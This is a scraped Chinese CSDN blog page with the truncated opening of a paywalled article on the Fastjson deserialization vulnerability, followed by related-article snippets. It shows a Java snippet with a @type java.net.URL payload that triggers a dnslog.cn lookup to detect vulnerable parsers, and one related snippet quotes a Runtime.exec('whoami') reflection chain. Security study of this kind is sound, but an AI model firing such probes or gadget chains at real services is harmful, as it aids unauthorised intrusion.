逆向学习fastjson反序列化始

最新推荐文章于 2024-08-11 01:45:18 发布
最新推荐文章于 2024-08-11 01:45:18 发布
阅读量7.5k 收藏 1
点赞数
分类专栏: 安全 代码审计 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sun1318578251/article/details/107355552
版权
本文从payload构造角度分析Fastjson反序列化漏洞,探讨@type字段的作用,解析漏洞成因,包括RCE payload的构成,并介绍了DNSLOG在漏洞探测中的应用。通过实例和文档引用,深入理解漏洞原理。
摘要由CSDN通过智能技术生成

前言

   Fastjson这款国内知名的解析json的组件,笔者在此就不多介绍,网络上有很多分析学习fastjson反序列化漏洞文章。笔者在此以一种全新角度从分析payload构造角度出发,逆向学习分析fastjson反序列化漏洞始末。
ps:漏洞学习环境以代码均在上传Github项目

初窥Payload

   下面是一段最简单Fastjson的版本号反序列化--URLDNS代码,观察发现可以提出一个问题@type作用?

import com.alibaba.fastjson.JSON;
public class urldns {
   
    public static void main(String[] args) {
   
        // dnslog平台网站:http://www.dnslog.cn/
        String payload = "{
   {\"@type\":\"java.net.URL\",\"val\"" +
                ":\"http://h2a6yj.dnslog.cn\"}:\"summer\"}";
        JSON.parse(payload);
    }
}

@type的作用

   下面是一段实验代码,帮助理解分析@type的由来。

public class User {
   
    private String name;
    private int age;
 

    public String getName() {
   
        return name;
    }
    public void setName(String name) {
   
        this.name = name;
    }

    public int getAge() {
   
        return age;
    }
    public void setAge(int age) {
   
        this.age = age;
    }
     @Override
    public String toString() {
   
        return "User{" +
                "name='" + name + '\'' +
                ", age=" + age +
                '}';
    }
    
}


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  夏日清1
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
fastjson反序列化多层嵌套泛型类与java中的Type类型

				
			

			

				

					zhangustb
				

				

					06-24
					
					1019
					
				

			

		

		

			
				
参考fastjson反序列化多层嵌套泛型类与java中的Type类型 - liqipeng - 博客园fastjson使用TypeReference反序列化2层以上嵌套泛型类 以及注意使用ParameterizedTypeImpl在之前的fastjson版本的一个坑fastjson反序列化使用不当导致内存泄露 - liqipeng - 博客园...

			
		

	



                

              
                



	

		

			

				
					
fastjson TypeReference 泛型类型(详解)

				
			

			

				

					demo_yo的博客
				

				

					06-01
					
					1181
					
				

			

		

		

			
				
com.alibaba.fastjson.TypeReference  即类型引用,用于指定我们使用 com.alibaba.fastjson 进行 json 转换时的对象类型。官方解释:表示泛型的类型。Java 还没有提供表示泛型类型的方法,所以这个类提供了。强制客户端创建该类的子类,使其即使在运行时也能检索类型信息。例如,要为 List 创建类型文本,您可以创建一个空的匿名内部类:此语法不能用于创建具有通配符参数的类型字面值,Class 或 List

			
		

	



                


  
              

                


	

		

			

				
					
科普文:Java基础系列之【字节码应用案例Fastjson反序列化漏洞】

					
最新发布

				
			

			

				

					为无为,事无事,味无味。
				

				

					08-11
					
					1068
					
				

			

		

		

			
				
transform方法利用Java的反射机制进行函数调用,传入的参数是input是一个实例化对象,利用这个方法便可以调用任意对象的任意方法(exec)从而执行命令,所以在DeSertPoc类里新建Transformer,最后组成的核心表达式为:((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("whoami");基于TemplateImpl的方法可以直接执行bytecodes。

			
		

	





	

		

			

				
					
Java通过泛型的模板类型实例化对象

					
热门推荐

				
			

			

				

					Android开源技术交流
				

				

					06-08
					
					1万+
					
				

			

		

		

			
				
通过泛型的模板类型实例化对象

最近自己研究了下mvvm框架,使用泛型的方式可节省很多代码,并且可以合并很多冗余代码,为了最大化的精简代码想到了通过泛型的type用反射的方式实例化对象,这样对象的实例化代码就不用每次都去复写函数来创建了,下面来看看代码。



public class BaseViewModel<M extends Model> implements ViewMode...

			
		

	



		

			
		



	

		

			

				
					
java:利用fastjson判断一个类型(java.lang.reflect.Type)是否是一个javabean

				
			

			

				

					10km的专栏
				

				

					09-10
					
					8954
					
				

			

		

		

			
				
fastjson中JSON.toJSON(Object javaObject)方法将一个java对象被序列化成json对象时,返回的对象类型有三种可能:JSONObject,JSONArray,原类型(简单类型)。 
最近在使用fastjson进行对java对象序列化和反序列化时,遇到一个问题: 
需要判断一个类型(java.lang.reflect.Type)是否为一个java bean(这里所

			
		

	





	

		

			

				
					
fast-json 生成与解析json数据

				
			

			

				

					qq_35555354的博客
				

				

					01-04
					
					1406
					
				

			

		

		

			
				
关于json数据的概念不再做多余的叙述,今天分享的是用fast-json 这个工具类处理json数据,同样关于fast-json的优势,也不做叙述了,总之记住很强大就可以了。所谓的处理无外乎两种最常见的情况,一是由封装好的数据实体类生成json数据(比如将用户信息封装成json格式的数据,发送给服务端),二是解析json数据,并将解析后的数据封装在实体类中(例如向服务端请求json格式数据,并解析)。代码也是根据这两个方向展开写的,代码封装的方法较多,建议看时顺序看,不明白的可留言交流~

			
		

	





	

		

			

				
					
Java安全漫谈 - 07.反序列化篇(1)1

				
			

			

				

					08-03
				

			

		

		

			
				
反序列化是序列化过程的逆向操作,序列化是将对象的状态转换为可存储或可传输的数据格式。在Java中,反序列化通常是通过实现`Serializable`接口并在类中包含`readObject`方法来完成的。  在Java中,`readObject`方法...

			
		

	





	

		

			

				
					
fastjson深度源码解析- 序列化(二) - 序列化字节和字符串解析

				
			

			

				

					商宗海的博客
				

				

					02-04
					
					2189
					
				

			

		

		

			
				
SerializeWriter成员函数



序列化16进制字节数组



    public void writeHex(byte[] bytes) {
        /** 计算总共字符长度, 乘以2 代表一个字符要占用2字节, 3代表要添加 x 和 前后添加' */
        int newcount = count + bytes.length * 2 + 3;

			
		

	





	

		

			

				
					
基于混合分析的Java反序列化利用链挖掘方法.docx

				
			

			

				

					05-27
				

			

		

		

			
				
序列化是将Java对象转换为可存储或传输的形式(如字节序列、JSON字符串或XML字符串),而反序列化则是这一过程的逆向操作。在许多应用场景中,如远程过程调用(RPC)或HTTP请求参数处理时,反序列化操作频繁出现。例如...

			
		

	





	

		

			

				
					
自定义枚举对象序列化规则: 在Json中以枚举的code值表示枚举;枚举序列化时,新增枚举描述字段;String到IEnum的转换

				
			

			

				

					iOS逆向与安全
				

				

					07-09
					
					256
					
				

			

		

		

			
				
GetterENABLE("1", "启用"),DEACTIVATE("0", "停用");@EnumValue// 自定义toString方法返回code@Override。

			
		

	





	

		

			

				
					
fastjson为何使用TypeReference?

				
			

			

				

					JavaEdge全是干货的技术号
				

				

					09-26
					
					3793
					
				

			

		

		

			
				
1 核心接口及类
fastJson 的泛型反序列化场景经常使用到 TypeReference,如下示例:
public static void main(String[] args) {
    List<String> list = new ArrayList<String>();
    list.add("1");
    list.add("2");

    JSONObject o = new JSONObject();
    o.put("k",list);

   

			
		

	





	

		

			

				
					
fastjson反序列化过滤字段属性_最新fastjson反序列化漏洞分析

				
			

			

				

					weixin_39914863的博客
				

				

					11-22
					
					535
					
				

			

		

		

			
				
前言写的有点多,可能对师傅们来说比较啰嗦,不过这么写完感觉自己也就明白了pocnewPoc.javaimport com.alibaba.fastjson.JSON;  public class newPoc {     public static void main(String[] argv) {         String payload = "{"name":{"@type":"java...

			
		

	





	

		

			

				
					
JSON转换工具:fastjson与jackson以及fastjson的enable_type

				
			

			

				

					在远行的路上
				

				

					09-08
					
					2003
					
				

			

		

		

			
				
JSON在开发过程中的作用越来越重要,特别是异构平台之间,使用JSON来通信是非常简单的。一般情况下,在使用json进行转换的时候,一般会采用JSONObject或者是google的Gson。今天给大家介绍两个非常好用,功能非常强大的工具:fastjson和jackson。
两个的依赖如下:

  com.alibaba
  fastjson
  1.1.37


 
  org.codeha

			
		

	





	

		

			

				
					
[转载]fastjson反序列化多层嵌套泛型类与java中的Type类型

				
			

			

				

					qq_17056391的博客
				

				

					04-06
					
					1471
					
				

			

		

		

			
				
fastjson 转换泛型以及list通用方法,如: 比如 UCRoot>(types = [UCRoot.class,List.class,Hospital.class]) 、List(types=[List.class,Hospital.class]) 等





public static Object parseObject(String jsonStr, Type[] types) {
	if (isBlank(jsonStr) || ArrayUtils.isEmpty(types)) 

			
		

	





	

		

			

				
					
fastjson 如何忽略@type类型解析

				
			

			

				

					程序员星痕的博客
				

				

					09-14
					
					4113
					
				

			

		

		

			
				
最新使用Springboot redisTemplate遇到一个问题,自定义RedisSerializer中使用了fastjson进行序列化,调用JSON.toJSONString函数时添加了SerializerFeature.WriteClassName参数,导致反序列化的时候报错,,原因就是反序列化指定的类类型与序列化的时候不一致,虽然类名一样,但是全路径不一样。通常在不同的系统间进行交互,使用同一个redis集群中的资源时会出该问题。自定义AutoTypeCheckHandler,进行全局配置。

			
		

	





	

		

			

				
					
反序列化FastJson1.2.24 反序列化漏洞解析(CVE-2017-18349)

				
			

			

				

					Continuejww的博客
				

				

					09-17
					
					348
					
				

			

		

		

			
				
基于Vulhub平台完整复现+CVE-2017-18349复现+注意事项。

			
		

	





	

		

			

				
					
序列化时包名处理

				
			

			

				

					mada26
				

				

					04-30
					
					1432
					
				

			

		

		

			
				
前提:同一个实体,在两个项目中使用

使用fastjson进行序列化反序列化,两个实体的包名无需保持一致:fastjson序列化反序列化是根据**@JSONField注解**中的name等字段进行处理的。
使用io流进行序列化反序列化,两个实体的包名必须保持一致:否则反序列化时根据实体类的全路径找不到对应的实体类会反序列化失败。


...

			
		

	





	

		

			

				
					
Fastjson反序列化安全风险解析

				
			

			

				

					
				

			

		

		

			
				
"S14-fastjson反序列化1 - 关于Java中Fastjson库的使用与安全风险"  Fastjson是阿里巴巴开发的一个Java语言编写的高性能功能完备的JSON库。它可以直接将Java对象转换为JSON字符串,也可以直接将JSON内容转换为Java...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值